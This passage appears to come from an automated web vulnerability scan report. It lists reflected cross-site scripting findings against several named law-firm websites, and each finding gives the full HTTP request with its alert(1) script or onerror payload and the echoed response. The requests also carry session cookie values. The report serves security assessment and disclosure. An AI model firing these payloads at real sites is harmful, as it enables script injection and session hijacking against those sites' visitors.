This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /connect_forgotpassword.cfm?p=6024eb9"><img%20src%3da%20onerror%3dalert(1)>4643c09008e HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.5.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<input type="hidden" name="p" value="6024eb9"><img src=a onerror=alert(1)>4643c09008e" />
...[SNIP]...

4.168. http://www.pillsburylaw.com/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16e81"><a>f671e58fc63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.cfm?pageID=60&16e81"><a>f671e58fc63=1 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.2.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<a href="printfriendly.cfm?pageID=60&16e81"><a>f671e58fc63=1&printF=1" target="_blank">
...[SNIP]...

4.169. http://www.stroock.com/sitecontent.cfm [contentID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stroock.com
Path:   /sitecontent.cfm

Issue detail

The value of the contentID request parameter is copied into the HTML document as plain text between tags. The payload bbde0<img%20src%3da%20onerror%3dalert(1)>1ea5943f0a8 was submitted in the contentID parameter. This input was echoed as bbde0<img src=a onerror=alert(1)>1ea5943f0a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitecontent.cfm?contentID=64bbde0<img%20src%3da%20onerror%3dalert(1)>1ea5943f0a8 HTTP/1.1
Host: www.stroock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.stroock.com/
Cookie: CFID=6906919; CFTOKEN=98918862; __utma=266256077.1614775241.1305202918.1305202918.1305202918.1; __utmb=266256077.1.10.1305202918; __utmc=266256077; __utmz=266256077.1305202918.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Stroock%20%26%20Stroock%20%26%20Lavan

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 12:26:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CIT
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 64bbde0<img src=a onerror=alert(1)>1ea5943f0a8 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

4.170. http://www.wolfgreenfield.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb09b"><script>alert(1)</script>c37b8140c4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocb09b"><script>alert(1)</script>c37b8140c4a HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:12 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/favicon.icocb09b"><script>alert(1)</script>c37b8140c4a');" title="Email Page">
...[SNIP]...

4.171. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e53a"><script>alert(1)</script>4a16753e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies3e53a"><script>alert(1)</script>4a16753e0/index HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:17 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies3e53a"><script>alert(1)</script>4a16753e0/index');" title="Email Page">
...[SNIP]...

4.172. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 863d1"><script>alert(1)</script>8dd4b629ffa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/index863d1"><script>alert(1)</script>8dd4b629ffa HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:18 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/index863d1"><script>alert(1)</script>8dd4b629ffa');" title="Email Page">
...[SNIP]...

4.173. http://www.wolfgreenfield.com/industries_technologies/index [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b9f3"><script>alert(1)</script>13f530a4eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/index?8b9f3"><script>alert(1)</script>13f530a4eb=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:13 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 42976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/index?8b9f3"><script>alert(1)</script>13f530a4eb=1');" title="Email Page">
...[SNIP]...

4.174. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/v_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a405c"><script>alert(1)</script>04df5b956ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologiesa405c"><script>alert(1)</script>04df5b956ee/v_arrow.gif HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:09 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologiesa405c"><script>alert(1)</script>04df5b956ee/v_arrow.gif');" title="Email Page">
...[SNIP]...

4.175. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/v_arrow.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e36e6"><script>alert(1)</script>50931122149 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/v_arrow.gife36e6"><script>alert(1)</script>50931122149 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:10 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/v_arrow.gife36e6"><script>alert(1)</script>50931122149');" title="Email Page">
...[SNIP]...

4.176. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/v_arrow.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2cd6"><script>alert(1)</script>c085222620d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/v_arrow.gif?b2cd6"><script>alert(1)</script>c085222620d=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:08 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif?b2cd6"><script>alert(1)</script>c085222620d=1');" title="Email Page">
...[SNIP]...

4.177. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac1d"><script>alert(1)</script>e29a99f7d9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascriptcac1d"><script>alert(1)</script>e29a99f7d9e/c_smartmenus.js HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:06 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/javascriptcac1d"><script>alert(1)</script>e29a99f7d9e/c_smartmenus.js');" title="Email Page">
...[SNIP]...

4.178. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3041"><script>alert(1)</script>5a79aaed420 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript/c_smartmenus.jsc3041"><script>alert(1)</script>5a79aaed420 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:07 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/javascript/c_smartmenus.jsc3041"><script>alert(1)</script>5a79aaed420');" title="Email Page">
...[SNIP]...

4.179. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/internet-domain-names

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fda"><script>alert(1)</script>b70efdb17f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_servicese9fda"><script>alert(1)</script>b70efdb17f9/internet-domain-names HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:35 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_servicese9fda"><script>alert(1)</script>b70efdb17f9/internet-domain-names');" title="Email Page">
...[SNIP]...

4.180. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/internet-domain-names

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a92"><script>alert(1)</script>9aa36121da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/internet-domain-names75a92"><script>alert(1)</script>9aa36121da HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:35 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/internet-domain-names75a92"><script>alert(1)</script>9aa36121da');" title="Email Page">
...[SNIP]...

4.181. http://www.wolfgreenfield.com/practices_services/internet-domain-names [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/internet-domain-names

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1054a"><script>alert(1)</script>764b2703e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/internet-domain-names?1054a"><script>alert(1)</script>764b2703e6d=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
